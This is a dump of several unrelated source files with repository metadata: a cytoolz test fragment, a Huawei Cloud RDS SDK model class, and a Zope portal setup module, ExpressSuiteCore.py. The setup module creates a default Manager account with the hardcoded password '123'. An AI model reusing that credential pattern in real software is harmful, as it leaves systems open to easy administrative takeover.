s2 = set(cytoolz.recipes.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
| [
"[email protected]"
] | |
570d5e5d5fbd8600a45c78d01b6b02a8b09ce153 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-rds/huaweicloudsdkrds/v3/model/set_database_user_privilege_request.py | 150b872cab2546ae4611dfa32d9ac8d91350c989 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 4,906 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SetDatabaseUserPrivilegeRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'instance_id': 'str',
'x_language': 'str',
'body': 'SetDatabaseUserPrivilegeReqV3'
}
attribute_map = {
'instance_id': 'instance_id',
'x_language': 'X-Language',
'body': 'body'
}
def __init__(self, instance_id=None, x_language=None, body=None):
"""SetDatabaseUserPrivilegeRequest
The model defined in huaweicloud sdk
:param instance_id: 实例ID
:type instance_id: str
:param x_language: 语言
:type x_language: str
:param body: Body of the SetDatabaseUserPrivilegeRequest
:type body: :class:`huaweicloudsdkrds.v3.SetDatabaseUserPrivilegeReqV3`
"""
self._instance_id = None
self._x_language = None
self._body = None
self.discriminator = None
self.instance_id = instance_id
if x_language is not None:
self.x_language = x_language
if body is not None:
self.body = body
@property
def instance_id(self):
"""Gets the instance_id of this SetDatabaseUserPrivilegeRequest.
实例ID
:return: The instance_id of this SetDatabaseUserPrivilegeRequest.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""Sets the instance_id of this SetDatabaseUserPrivilegeRequest.
实例ID
:param instance_id: The instance_id of this SetDatabaseUserPrivilegeRequest.
:type instance_id: str
"""
self._instance_id = instance_id
@property
def x_language(self):
"""Gets the x_language of this SetDatabaseUserPrivilegeRequest.
语言
:return: The x_language of this SetDatabaseUserPrivilegeRequest.
:rtype: str
"""
return self._x_language
@x_language.setter
def x_language(self, x_language):
"""Sets the x_language of this SetDatabaseUserPrivilegeRequest.
语言
:param x_language: The x_language of this SetDatabaseUserPrivilegeRequest.
:type x_language: str
"""
self._x_language = x_language
@property
def body(self):
"""Gets the body of this SetDatabaseUserPrivilegeRequest.
:return: The body of this SetDatabaseUserPrivilegeRequest.
:rtype: :class:`huaweicloudsdkrds.v3.SetDatabaseUserPrivilegeReqV3`
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this SetDatabaseUserPrivilegeRequest.
:param body: The body of this SetDatabaseUserPrivilegeRequest.
:type body: :class:`huaweicloudsdkrds.v3.SetDatabaseUserPrivilegeReqV3`
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SetDatabaseUserPrivilegeRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
fb5e14362c54bc9ed160c239f7c153c7f418275d | 8d5fac378cb1f7c826996e442375c7ee8cb842d5 | /ExpressSuiteTools/ExpressSuiteCore.py | 260f425a82a9434266342c857f1a9fc2b60b8c4d | [] | no_license | ichar/Express-Suite-DMS | 6f4cf7064b774894995b2224a3ca1a13ac4aa64a | bdf3ad7c1ec4bcdec08000bf4ac5315ca6a0ad19 | refs/heads/master | 2021-01-11T10:59:15.101637 | 2018-02-16T02:09:12 | 2018-02-16T02:09:12 | 72,807,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,181 | py | """
ExpressSuiteCore and PortalGenerator classes
$Id: ExpressSuiteCore.py, v 1.0 2007/08/30 12:00:00 Exp $
*** Checked 09/06/2009 ***
"""
__version__ = '$Revision: 1.0 $'[11:-2]
import Zope2
import sys, os
from copy import copy
from locale import setlocale, getlocale, LC_ALL
from string import join
from urllib import splittype, splitport
from urlparse import urlparse
from types import StringType, UnicodeType
from Globals import HTMLFile, DTMLFile, package_home, get_request
from AccessControl import ClassSecurityInfo
from Acquisition import aq_get
from ZPublisher import Publish
from ZPublisher.HTTPRequest import default_port
from ZPublisher.BeforeTraverse import NameCaller, registerBeforeTraverse, queryBeforeTraverse
from Products.CMFCore import permissions as CMFCorePermissions
from Products.CMFCore.FSDTMLMethod import FSDTMLMethod
from Products.CMFCore.FSImage import FSImage
from Products.CMFCore.PortalObject import PortalObjectBase
from Products.CMFCore.DirectoryView import addDirectoryViews, createDirectoryView
from Products.CMFCore.utils import getToolByName, _checkPermission, _getAuthenticatedUser
from Products.CMFDefault import DiscussionItem, SkinnedFolder
from Products.CMFDefault import cmfdefault_globals
from Products.CMFDefault.DublinCore import DefaultDublinCoreImpl
try: from Products.AppTracker.AppTracker import AppTracker
except ImportError: AppTracker = None
from logging import getLogger
logger = getLogger( 'ExpressSuiteCore' )
import Config
if Config.IsSQLCatalog:
import ZSQLCatalogTool as CatalogTool
from Products.ZMySQLDA.DA import Connection as SQLConnection
else:
import CatalogTool
import ActionsTool
import BackupFSRoot
import CommentsTool
import DTMLDocument, DefaultCategories, DepartmentDictionary
import ErrorLogTool, Exceptions, FSFile, FSFolder, Features, GuardedTable
import HTMLDocument, HTMLCard
import Mail, MailFolder, MemberDataTool, MetadataTool
import PropertiesTool, Registry, SearchProfile, ServicesTool, Shortcut
import TaskItem, TypesTool
import UserFolder
# these may need to be upgraded
#from MigrationTool import MigrationTool
from Config import Roles
from Heading import Heading, factory_type_information as Heading_factory_type_information
from ManageCMFContent import ManageCMFContent
from SimpleObjects import ContainerBase
from Utils import InitializeClass, getLanguageInfo, makepath, joinpath, pathdelim, formatComments, \
GetSessionValue, SetSessionValue, ExpireSessionValue
import CustomDefinitions
from CustomObjects import CustomDefs, ObjectHasCustomCategory, ObjectShouldBeCleanedBeforePaste, \
CustomCheckPermission, CustomCookedTableTranslit, getJSCleanerAttrs
factory_type_information = ( \
DTMLDocument.factory_type_information
+ FSFile.factory_type_information
+ FSFolder.factory_type_information
+ GuardedTable.factory_type_information
+ Heading_factory_type_information
+ HTMLDocument.factory_type_information
+ HTMLCard.factory_type_information
+ MailFolder.factory_type_information
+ Registry.factory_type_information
+ SearchProfile.factory_type_information
+ Shortcut.factory_type_information
+ TaskItem.factory_type_information
)
DiscussionItem_fti = copy( DiscussionItem.factory_type_information )
DiscussionItem_fti[0]['disallow_manual'] = 1
SkinnedFolder_fti = copy( SkinnedFolder.factory_type_information )
SkinnedFolder_fti[0]['disallow_manual'] = 1
cmf_factory_type_information = DiscussionItem_fti + SkinnedFolder_fti
class ExpressSuiteCore( ContainerBase, PortalObjectBase, DefaultDublinCoreImpl ):
"""
Functions of this class help in the setup of a new ExpressSuiteCore
"""
_class_version = 1.01
meta_type = 'ExpressSuiteCore'
__implements__ = ( Features.isPortalRoot,
Features.isPrincipiaFolderish,
PortalObjectBase.__implements__,
DefaultDublinCoreImpl.__implements__,
)
isPrincipiaFolderish = 1
security = ClassSecurityInfo()
manage_options = PortalObjectBase.manage_options + \
ContainerBase.manage_options
_properties = (
{'id':'title', 'type':'string', 'mode':'w'},
{'id':'description', 'type':'text', 'mode':'w'},
{'id':'server_url', 'type':'string', 'mode':'w'},
{'id':'stemmer', 'type':'string', 'mode':'w'},
{'id':'product_version', 'type':'string', 'mode':'w'},
)
# overriden by Implicit in ItemBase
__of__ = PortalObjectBase.__of__
# overriden by ObjectManager in ContainerBase
_checkId = PortalObjectBase._checkId
_verifyObjectPaste = PortalObjectBase._verifyObjectPaste
# default attribute values
title = ''
description = ''
server_url = None
product_version = None
service_unavailable = DTMLFile( 'dtml/service_unavailable', globals() )
def __init__( self, id, title='' ):
"""
Initializes class instance
"""
ContainerBase.__init__( self )
PortalObjectBase.__init__( self, id, title )
DefaultDublinCoreImpl.__init__( self )
def _initstate( self, mode ):
"""
Initializes instance attributes
"""
if not ContainerBase._initstate( self, mode ):
return 0
# install our before_traverse hook
if not queryBeforeTraverse( self, __name__ ):
registerBeforeTraverse( self, NameCaller('_beforeTraverseHook'), __name__ )
if not mode:
return 1
if getattr( self, 'server_url', None ) is None:
REQUEST = get_request()
self._setPropValue( 'server_url', REQUEST and REQUEST.physicalPathToURL('') or '' )
self._upgrade( 'portal_actions', ActionsTool.ActionsTool )
self._upgrade( 'portal_catalog', CatalogTool.CatalogTool )
self._upgrade( 'portal_memberdata', MemberDataTool.MemberDataTool )
self._upgrade( 'portal_metadata', MetadataTool.MetadataTool )
self._upgrade( 'portal_properties', PropertiesTool.PropertiesTool )
self._upgrade( 'portal_types', TypesTool.TypesTool )
for view in self.portal_skins.objectValues():
if getattr( view, '_isDirectoryView', None ):
view._dirpath = view._dirpath.replace( '\\', pathdelim )
if not hasattr( self, 'portal_errorlog' ):
tool = ErrorLogTool.ErrorLogTool()
self._setObject( tool.getId(), tool )
if not hasattr( self, 'portal_comments' ):
tool = CommentsTool.CommentsTool()
self._setObject( tool.getId(), tool )
if not hasattr( self, 'portal_services' ):
tool = ServicesTool.ServicesTool()
self._setObject( tool.getId(), tool )
gen = PortalGenerator()
gen.setupMail( self )
return 1
def _afterValidateHook( self, user, published=None, REQUEST=None ):
"""
Prepares global enviroment after the user is authenticated
"""
self.setContentCharset( REQUEST )
self.fixFormLanguage( REQUEST )
if isinstance( published, FSImage ):
REQUEST.RESPONSE.setHeader( 'Cache-Control', 'public, max-age=7200, must-revalidate' )
elif isinstance( published, FSDTMLMethod ):
REQUEST.RESPONSE.setHeader('Expires', 'Tue, 22 Jan 1980 01:01:01 GMT')
def _beforeTraverseHook( self, container, REQUEST, *args ):
"""
Prepares global enviroment before any object inside is accessed
"""
try:
self.fixProxiedRequest( REQUEST )
self.setPortalLocale()
self.setContentCharset( REQUEST )
except:
pass
try: mpath = list( Config.MaintainanceMode.get( self._p_oid ) or [] )
except: mpath = None
if not mpath:
return
stack = REQUEST['TraversalRequestNameStack']
mpath.reverse()
if stack and ( stack[-1] in ['portal_errorlog', 'scripts.js', 'styles.css'] or \
stack[0] == 'manage' or stack[0].startswith('manage_') ):
return
if stack[ -len(mpath): ] != mpath:
REQUEST['TraversalRequestNameStack'] = ['maintainance']
def _containment_onAdd( self, item, container ):
"""
Is called after our parent *item* is added to the *container*
"""
# Not calling base class's methods from here avoids reinitialization
# of all the content objects after product version change.
# Setup is carried by generator anyway.
# need to realize same as Scheduler schema to provide non-conflict database backup
# if more than one ExpressSuiteCore in ZODB is presented.
loop_app = self.getPhysicalRoot()
if not hasattr( loop_app, 'ExpressSuiteBackup' ):
try:
b = BackupFSRoot.BackupFSRoot()
loop_app._setObject( b.id, b )
except:
pass
def _containment_onDelete( self, item, container ):
"""
Is called before our parent *item* is deleted from its *container*
"""
root = self.getPhysicalRoot()
backupFSRoot = getattr(root, 'ExpressSuiteBackup', None)
if backupFSRoot is not None:
backupFSRoot.unregistryAppBackup( joinpath( item.getPhysicalPath() ) )
PortalObjectBase.manage_beforeDelete( self, item, container )
def _instance_onCreate( self ):
self.product_version = Config.ProductVersion
security.declareProtected( CMFCorePermissions.View, 'maintainance' )
def maintainance( self, REQUEST=None ):
"""
Maintainance mode
"""
if _checkPermission( CMFCorePermissions.ManagePortal, self ):
mpath = Config.MaintainanceMode.get( self._p_oid )
return self.redirect( action='/'.join(mpath) )
return self.service_unavailable( self, REQUEST )
#
# ==========================================================================================================
#
def view( self, REQUEST=None ):
""" Invokes the default view of the content storage """
REQUEST = REQUEST or self.REQUEST
return self.storage(REQUEST)
security.declarePrivate( 'fixProxiedRequest' )
def fixProxiedRequest( self, REQUEST ):
""" Fixes environment if request was processed by frontend server """
# mod_proxy: X-Forwarded-Server
# mod_accel: X-Host, X-Real-IP, X-URI, X-Method
server = REQUEST.get('SERVER_URL')
real_host = REQUEST.get('HTTP_X_FORWARDED_SERVER') or REQUEST.get('HTTP_X_HOST')
real_addr = REQUEST.get('HTTP_X_REAL_IP')
real_uri = REQUEST.get('HTTP_X_URI')
# change SERVER_URL to frontend server's address and protocol
if server and real_host:
proto = REQUEST.get('HTTP_X_METHOD') or splittype( server )[0]
host, port = splitport( real_host )
REQUEST.setServerURL( proto, host, port or default_port.get( proto ) )
# set REMOTE_ADDR to the real client's address
if real_addr:
REQUEST.environ['REMOTE_ADDR'] = real_addr
# modify SCRIPT_NAME for proxied requests like
# http://frontend/prefix/portal -> http://backend/portal
if real_uri:
# TODO: handle different portal name on frontend
pos = real_uri.find( REQUEST['PATH_INFO'] )
if pos > 0:
REQUEST._script = real_uri[ 1:pos ].split('/')
security.declarePrivate( 'setPortalLocale' )
def setPortalLocale( self ):
""" Changes system locale according to the portal language """
info = getLanguageInfo( self )
# find default and effective locale settings
def_locale = info.get( sys.platform + '_locale' ) or info.get( os.name + '_locale' )
cur_locale = getlocale()
cur_locale = None not in cur_locale and '.'.join( cur_locale ) or ''
# check whether locale is already ok
if def_locale is None or cur_locale.lower() == def_locale.lower():
return
# change effective locale
try:
setlocale( LC_ALL, def_locale )
except Exceptions.LocaleError:
pass
security.declarePublic( 'setContentCharset' )
def setContentCharset( self, REQUEST=None ):
""" Sets response charset according to the user's selected language """
REQUEST = REQUEST or aq_get( self, 'REQUEST', None )
if REQUEST is None:
return
lang = REQUEST.cookies.get( 'LOCALIZER_LANGUAGE' )
info = getLanguageInfo( lang, None )
if lang is None or info is None:
membership = getToolByName( self, 'portal_membership', None )
if membership is not None:
lang = membership.getLanguage( preferred=1, REQUEST=REQUEST )
info = getLanguageInfo( lang )
REQUEST.set( 'LOCALIZER_LANGUAGE', lang )
if not membership.isAnonymousUser():
path = joinpath( '', REQUEST._script, self.absolute_url( relative=1 ) )
REQUEST.RESPONSE.setCookie( 'LOCALIZER_LANGUAGE', lang, path=path )
charset = info['http_charset']
REQUEST.set( 'LOCALIZER_CHARSET', charset )
REQUEST.set( 'management_page_charset', charset )
REQUEST.RESPONSE.setHeader( 'content-type', 'text/html; charset=%s' % charset )
security.declarePublic( 'fixFormLanguage' )
def fixFormLanguage( self, REQUEST ):
"""
Replaces HTML-encoded entities with their corresponding
characters in the POST form data
"""
if REQUEST is None:
return
lang = REQUEST.get( 'LOCALIZER_LANGUAGE' )
map = Config.LanguageEntitiesMap.get( lang )
if map is None:
return
for key, value in REQUEST.form.items():
if type(value) in ( StringType, UnicodeType, ):
for entity, char in map.items():
value = value.replace( entity, char )
REQUEST.form[ key ] = value
if REQUEST.REQUEST_METHOD == 'PUT':
value = REQUEST.other.get('BODY')
if value is not None:
for entity, char in map.items():
value = value.replace( entity, char )
REQUEST.other['BODY'] = value
security.declareProtected( CMFCorePermissions.View, 'isEffective' )
def isEffective( self, date ):
""" Override DefaultDublinCoreImpl's test, since we are always viewable """
return 1
def reindexObject( self, idxs=[] ):
""" Overrides DefaultDublinCoreImpl's method """
pass
def productVersion( self ):
""" Returns version string of the product """
return Config.ProductVersion
#
# Portal global utilities ==================================================================================
#
security.declarePublic( 'getPortalObject' )
def getPortalObject( self ):
""" Returns the portal object itself """
return self
security.declarePublic( 'getPortalConfiguration' )
def getPortalConfiguration( self ):
""" Returns the PortalConfiguration object """
return CustomDefinitions.portalConfiguration
security.declarePublic( 'getDepartmentDictionary' )
def getDepartmentDictionary( self ):
""" Returns the DepartmentDictionary object """
return DepartmentDictionary.departmentDictionary
security.declarePublic( 'getCustomDefinitions' )
def getCustomDefinitions( self, defs, *args, **kw ):
""" Returns given custom definition value """
return CustomDefs( defs, *args, **kw )
security.declarePublic( 'hasCustomCategory' )
def hasCustomCategory( self, context ):
""" Returns given custom definition value """
return ObjectHasCustomCategory( context )
def shouldBeCleanedBeforePaste( self, context ):
""" Verifies whether content body should be cleaned before paste """
return ObjectShouldBeCleanedBeforePaste( context )
security.declarePublic( 'getJSCleanerForCategory' )
def getJSCleanerAttrsForCategory( self, context, category, **kw ):
""" Returns js cleaner attrs """
return getJSCleanerAttrs( context, category, **kw )
security.declarePublic( 'getCustomCookedTableTranslit' )
def getCustomCookedTableTranslit( self, context, id, values ):
""" Returns translitted custom data table values """
return CustomCookedTableTranslit( context, id, values )
security.declarePublic( 'getFormattedComments' )
def getFormattedComments( self, text, mode=None ):
""" Returns formatted comments text """
return formatComments( text, mode )
security.declarePublic( 'hasCustomPermissions' )
def hasCustomPermissions( self, context, permission ):
""" Returns given custom definition value """
return CustomCheckPermission( context, permission )
security.declarePublic( 'getSession' )
def getSession( self, name, default=None, REQUEST=None, cookie=None ):
""" Returns session data value """
return GetSessionValue( self, name, default, REQUEST, cookie )
security.declarePublic( 'setSession' )
def setSession( self, name, value, REQUEST=None, cookie=None ):
""" Stores session data value """
SetSessionValue( self, name, value, REQUEST, cookie )
InitializeClass( ExpressSuiteCore )
class PortalGenerator:
klass = ExpressSuiteCore
def setupTools( self, p ):
"""
Setup initial tools
"""
addCMFCoreTool = p.manage_addProduct['CMFCore'].manage_addTool
addCMFCoreTool( 'CMF Skins Tool', None )
addCMFCoreTool( 'CMF Undo Tool', None )
addCMFCoreTool( 'CMF URL Tool', None )
addCMFDefaultTool = p.manage_addProduct['CMFDefault'].manage_addTool
addCMFDefaultTool( 'Default Discussion Tool', None )
addCMFDefaultTool( 'Default Registration Tool', None )
addExpressSuiteTool = p.manage_addProduct['ExpressSuiteTools'].manage_addTool
addExpressSuiteTool( 'ExpressSuite Actions Tool', None )
addExpressSuiteTool( 'ExpressSuite Catalog Tool', None )
addExpressSuiteTool( 'ExpressSuite Comments Tool', None )
addExpressSuiteTool( 'ExpressSuite DocumentLink Tool', None )
addExpressSuiteTool( 'ExpressSuite ErrorLog Tool', None )
addExpressSuiteTool( 'ExpressSuite Followup Actions Tool', None )
addExpressSuiteTool( 'ExpressSuite Help Tool', None )
addExpressSuiteTool( 'ExpressSuite Member Data Tool', None )
addExpressSuiteTool( 'ExpressSuite Membership Tool', None )
addExpressSuiteTool( 'ExpressSuite Metadata Tool', None )
addExpressSuiteTool( 'ExpressSuite Properties Tool', None )
addExpressSuiteTool( 'ExpressSuite Types Tool', None )
addExpressSuiteTool( 'ExpressSuite Workflow Tool', None )
addExpressSuiteTool( 'ExpressSuite Services Tool', None )
addExpressSuiteTool( 'Portal Scheduler Tool', None )
#addExpressSuiteTool( 'ExpressSuite Migration Tool', None )
def setupMessageCatalog( self, p, language ):
langs = Config.Languages
p.manage_addProduct['Localizer'].manage_addMessageCatalog( 'msg', 'Messages', langs.keys())
msg = p._getOb( 'msg' )
path = joinpath( package_home( globals() ), 'locale' )
msg.manage_changeDefaultLang( language or Config.DefaultLanguage )
for lang, info in langs.items():
charset = info['python_charset'].upper()
msg.update_po_header( lang, '', '', '', charset )
# import PO file into the Message Catalog
try:
file = open( joinpath( path, '%s.po' % lang ), 'rt' )
except IOError:
pass
else:
msg.manage_import( lang, file )
file.close()
# fix empty string (just in case...)
msg.manage_editLS( '', (lang, '') )
# select default language
p.setPortalLocale()
p.setContentCharset()
def setupMail( self, p ):
"""
Create mail objects
"""
mh = getattr( p, 'MailHost', None )
if not ( mh is None or isinstance( mh, Mail.MailServerBase ) ):
p._delObject( 'MailHost' )
mh = None
if mh is None:
Mail.manage_addMailSender( p, 'MailHost', host='' )
if getattr( p, 'MailServer', None ) is None:
Mail.manage_addMailServer( p, 'MailServer', host='' )
def setupUserFolder( self, p ):
p.manage_addProduct['ExpressSuiteTools'].addUserFolder()
def setupCookieAuth( self, p ):
p.manage_addProduct['CMFCore'].manage_addCC( id='cookie_authentication' )
p.cookie_authentication.auto_login_page = ''
def setupRoles( self, p ):
p.__ac_roles__ = ( 'Member', 'Visitor', 'Editor', 'Writer', 'Reader', 'Author', 'VersionOwner' )
def setupPermissions( self, p ):
"""
Setup some suggested roles to permission mappings
"""
mp = p.manage_permission
for entry in Config.PortalPermissions:
apply( mp, entry )
def setupDefaultSkins( self, p ):
"""
Setup portal skins
"""
pstool = getToolByName( p, 'portal_skins', None )
#pstool = getattr( p, 'portal_skins', None )
if pstool is None:
return
cmf_manager = ManageCMFContent()
for view in Config.SkinViews:
cmf_manager.register_view( pstool, 'skins/%s' % view )
# these skin elements are available for anonymous visitors
#for name in Config.PublicViews:
# pstool[ name ].manage_permission( CMFCorePermissions.View, [Roles.Anonymous], 1 )
addDirectoryViews( pstool, 'skins', cmfdefault_globals )
pstool.manage_addProduct['OFSP'].manage_addFolder( id='custom' )
default_skins = ', '.join( ['custom'] + Config.SkinViews )
pstool.addSkinSelection( 'Site', default_skins, make_default=1 )
pstool.addSkinSelection( 'Mail', 'mail_templates' )
p.setupCurrentSkin()
def setupTypes( self, p, initial_types=factory_type_information ):
"""
Setup portal types
"""
tptool = getToolByName( p, 'portal_types', None )
#tptool = getattr( p, 'portal_types', None )
if tptool is None:
return
for x in initial_types:
if not tptool.getTypeInfo( x['id'] ):
tptool.addType( x['id'], x )
def setupCategories( self, p, categories=None, **kw ):
"""
Setup default categories
"""
metadata = getToolByName( p, 'portal_metadata', None )
if metadata is None:
return
if not categories:
categories = ['Document', 'SimpleDocs']
default_categories = DefaultCategories.DefaultCategories()
for id in categories:
if metadata.getCategoryById( id ):
continue
category = DefaultCategories.setupCategory( default_categories, id, metadata )
if category is None:
continue
workflow = category.getWorkflow()
if workflow is None:
continue
DefaultCategories.setupWorkflow( default_categories, workflow, id, metadata )
del default_categories
def setupMimetypes( self, p ):
"""
Setup mime types
"""
p.manage_addProduct[ 'CMFCore' ].manage_addRegistry()
reg = p.content_type_registry
reg.addPredicate( 'dtml', 'extension' )
reg.getPredicate( 'dtml' ).edit( extensions="dtml" )
reg.assignTypeName( 'dtml', 'DTMLDocument' )
reg.addPredicate( 'link', 'extension' )
reg.getPredicate( 'link' ).edit( extensions="url, link" )
reg.assignTypeName( 'link', 'Link' )
reg.addPredicate( 'news', 'extension' )
reg.getPredicate( 'news' ).edit( extensions="news" )
reg.assignTypeName( 'news', 'News Item' )
reg.addPredicate( 'document', 'major_minor' )
reg.getPredicate( 'document' ).edit( major="text", minor="" )
reg.assignTypeName( 'document', 'HTMLDocument' )
reg.addPredicate( 'image', 'major_minor' )
reg.getPredicate( 'image' ).edit( major="image", minor="" )
reg.assignTypeName( 'image', 'Site Image' )
reg.addPredicate( 'file', 'major_minor' )
reg.getPredicate( 'file' ).edit( major="application", minor="" )
reg.assignTypeName( 'file', 'File' )
def setupWorkflow( self, p, check=0 ):
"""
Setup default workflow
"""
workflow = getToolByName( p, 'portal_workflow', None )
tptool = getToolByName( p, 'portal_types', None )
if workflow is None or tptool is None:
return
cbt = workflow._chains_by_type
count = 0
seen = []
for chain, types in Config.WorkflowChains.items():
seen.extend( types )
for pt in types:
if not cbt or cbt.get( pt ) != chain:
count += 1
if not check:
wf_id = 'heading_workflow'
workflow.createWorkflow( wf_id )
workflow.setChainForPortalTypes( Config.WorkflowChains['heading_workflow'], ( wf_id, ) )
workflow.setChainForPortalTypes( Config.WorkflowChains['__empty__'], ('', ) )
DefaultCategories.setupHeadingWorkflow( workflow.getWorkflowById( wf_id ) )
return count
def setupDefaultMembers( self, p, lang='ru' ):
"""
Adds default members and groups
"""
membership = getToolByName( p, 'portal_membership', None )
msg = getToolByName( p, 'msg', None )
if None in ( membership, msg ):
return None
membership._addGroup( 'all_users', msg.gettext( 'All users', lang=lang ) )
membership._addGroup( '_managers_', msg.gettext( 'Managers', lang=lang ) )
username = None
try: username = _getAuthenticatedUser().getUserName()
except: pass
if not username:
username = 'admin'
roles = ( 'Member', 'Manager', )
properties = { 'lname' : msg.gettext( 'admin', lang=lang ) }
membership.addMember( id=username, password='123', roles=roles, domains='', properties=properties )
member = membership.getMemberById( username )
if member is None:
return None
users = [ username ]
membership.manage_changeGroup( group='all_users', group_users=users )
membership.manage_changeGroup( group='_managers_', group_users=users )
return member
def setupStorage( self, p, create_userfolder=None ):
"""
Setup storage folders
"""
if p is None:
return
base = p.manage_addProduct['ExpressSuiteTools']
if base is None:
return
msg = getToolByName( p, 'msg', None )
if msg is None:
return
lang = msg.get_default_language()
member = create_userfolder and self.setupDefaultMembers( p, lang ) or None
storage = self._makeHeading( p.manage_addProduct['ExpressSuiteTools'], 'storage', \
msg.gettext( 'Content storage', lang=lang ) )
if storage:
self._makeHeading( p.storage.manage_addProduct['ExpressSuiteTools'], 'members', \
msg.gettext( 'Home folders', lang=lang ) )
self._makeHeading( p.storage.manage_addProduct['ExpressSuiteTools'], 'user_defaults', \
msg.gettext( 'Default content', lang=lang ) )
system = self._makeHeading( p.storage.manage_addProduct['ExpressSuiteTools'], 'system', \
msg.gettext( 'System folders', lang=lang ) )
else:
system = None
if system:
self._makeHeading( p.storage.system.manage_addProduct['ExpressSuiteTools'], 'templates', \
msg.gettext( 'Document templates', lang=lang ) )
if storage:
mp = p.storage.manage_permission
mp('List folder contents', ['Owner','Manager', 'Editor', 'Writer', 'Reader', 'Author'], 0)
mp('View', ['Owner','Manager', 'Member'], 1)
if create_userfolder and member is not None:
home = member.getHomeFolder( create=1 )
# add access rights for system folder
if system:
p.storage.system.manage_setLocalGroupRoles( 'all_users', ['Reader'] )
if storage:
if member is not None:
p.storage.changeOwnership( member, recursive=1 )
p.storage.reindexObject( recursive=1 ) #idxs=['allowedRolesAndUsers'],
def setupTracker( self, p ):
"""
Setup tracker
"""
pass
def setupActions( self, p ):
"""
Setup portal actions
"""
actions = getToolByName( p, 'portal_actions', None )
if actions is None:
return
actions.action_providers = ( \
'portal_comments'
, 'portal_discussion'
, 'portal_help'
, 'portal_membership'
, 'portal_metadata'
, 'portal_properties'
, 'portal_registration'
, 'portal_services'
, 'portal_scheduler'
, 'portal_undo'
, 'portal_workflow'
)
def setupCatalog( self, p ):
"""
Setup portal catalogs
"""
tool_ids = ( 'portal_catalog', 'portal_followup', 'portal_links', )
for id in tool_ids:
ob = getToolByName( p, id, None )
if ob is None:
return
if Config.IsSQLCatalog and ob.implements('IZSQLCatalog'):
ob.sql_db_name = p.getId()
ob.sql_prefix = ''.join([ x[0:1] for x in id.split('_') ] )
ob.sql_root = '_Root'
ob.sql_user = Config.SQLDBUser
ob.setup()
ob.setupIndexes()
def setup( self, p, language, create_userfolder ):
"""
Setup portal object
"""
logger.info('Setup new ExpressSuite instance, id: %s, IsSQLCatalog: %s' % ( p.getId(), Config.IsSQLCatalog ) )
if Config.IsSQLCatalog:
id = Config.SQLDBConnectorID
addZMySQLConnection( p, id, 'Z MySQL Database Connection', 1 )
self.setupTools( p )
self.setupCatalog( p )
self.setupMessageCatalog( p, language )
self.setupMail( p )
if int(create_userfolder) != 0: self.setupUserFolder( p )
self.setupCookieAuth( p )
self.setupRoles( p )
self.setupPermissions( p )
self.setupDefaultSkins( p )
# SkinnedFolders are only for customization;
# they aren't a default type.
default_types = tuple( filter( lambda x: x['id'] != 'Skinned Folder', factory_type_information ) )
self.setupTypes( p, default_types )
self.setupTypes( p, cmf_factory_type_information )
self.setupCategories( p )
self.setupMimetypes( p )
self.setupWorkflow( p )
self.setupActions( p )
self.setupManual( p, 'manual' )
logger.info('Successfully created new instance')
def setupManual( self, target, path, ctype=None ):
"""
Setup manual
"""
createDirectoryView( target, makepath( path ) )
def create( self, parent, id, language, create_userfolder ):
"""
Creates an instance
"""
id = str(id)
portal = self.klass( id=id )
parent._setObject( id, portal )
# Return the fully wrapped object
p = parent.this()._getOb( id )
self.setup( p, language, create_userfolder )
return p
def setupDefaultProperties( self, p, id, title, description, email_from_address, email_from_name,
validate_email, server_url, stemmer ):
"""
Setup default portal properties
"""
p._setProperty( 'email_from_address', email_from_address, 'string' )
p._setProperty( 'email_from_name', email_from_name, 'string' )
p._setProperty( 'validate_email', validate_email and 1 or 0, 'boolean' )
p._setProperty( 'email_antispam', '', 'string' )
p._setProperty( 'email_error_address', '', 'string' )
p._setProperty( 'instance', id, 'string' )
p._setProperty( 'remote_url', '', 'string' )
p._setProperty( 'apply_threading', 1, 'boolean' )
p._setProperty( 'use_timeout', 1, 'boolean' )
p._setProperty( 'duration', 0.001, 'float' )
p._setProperty( 'p_resolve_conflict', 0, 'boolean' )
p._setProperty( 'max_involved_users', 10, 'int' )
p._setProperty( 'service_timeout', 30, 'int' )
p._setProperty( 'created_search_interval', 999, 'int' )
p._setProperty( 'common_url', '', 'string' )
p._setProperty( 'send_to_support', 0, 'boolean' )
p._setProperty( 'member_activity', 1, 'boolean' )
p._setProperty( 'emergency_service', 0, 'boolean' )
p._setProperty( 'p_log', 0, 'boolean' )
p._setProperty( 'suspended_mail', 1, 'boolean' )
p._setProperty( 'mail_frequency', 1, 'int' )
p._setProperty( 'mail_threshold', 500, 'int' )
p._setPropValue( 'server_url', server_url )
p._setPropValue( 'stemmer', stemmer )
p.title = title
